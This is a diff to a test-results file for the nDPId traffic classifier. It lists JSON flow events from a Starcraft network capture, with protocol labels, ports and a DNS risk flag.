00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389968488,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3484,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1437389985891,"flow_last_seen":1437389985996,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":35189,"flow_avg_l4_payload_len":858,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3527,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985892,"flow_last_seen":1437389985994,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23509,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3528,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985898,"flow_last_seen":1437389985969,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985898,"flow_last_seen":1437389985982,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985923,"flow_last_seen":1437389985992,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3531,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1437389985891,"flow_last_seen":1437389985996,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":35189,"flow_avg_l4_payload_len":858,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3527,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985892,"flow_last_seen":1437389985994,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23509,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3528,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985898,"flow_last_seen":1437389985969,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985898,"flow_last_seen":1437389985982,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985923,"flow_last_seen":1437389985992,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3531,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985961,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985962,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3533,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985960,"flow_last_seen":1437389985960,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3534,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985960,"flow_last_seen":1437389985960,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":215,"flow_first_seen":1437389982130,"flow_last_seen":1437389985956,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":38286,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.130","src_port":3517,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Starcraft","breed":"Fun","category":"Game"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3479,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968525,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3481,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3482,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968541,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3489,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3490,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968522,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3491,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968486,"flow_last_seen":1437389968520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00929{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389964752,"flow_last_seen":1437389964835,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":215,"flow_first_seen":1437389982130,"flow_last_seen":1437389985956,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":38286,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.130","src_port":3517,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Starcraft","breed":"Fun","category":"Game"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3479,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968525,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3481,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3482,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968541,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3489,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3490,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968522,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3491,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389968486,"flow_last_seen":1437389968520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00929{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389964752,"flow_last_seen":1437389964835,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389953643,"flow_last_seen":1437389953774,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.30.252.91","dst_ip":"192.168.1.100","src_port":443,"dst_port":3213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982884,"flow_last_seen":1437389982933,"flow_idle_time":200000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.166","src_port":6113,"dst_port":1119,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Starcraft","breed":"Fun","category":"Game"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982884,"flow_last_seen":1437389982933,"flow_idle_time":200000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.166","src_port":6113,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982782,"flow_last_seen":1437389982833,"flow_idle_time":200000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.212","src_port":6113,"dst_port":1119,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Starcraft","breed":"Fun","category":"Game"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982782,"flow_last_seen":1437389982833,"flow_idle_time":200000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.212","src_port":6113,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389981197,"flow_last_seen":1437389981500,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":515,"flow_tot_l4_payload_len":654,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3515,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1437389981330,"flow_last_seen":1437389981497,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 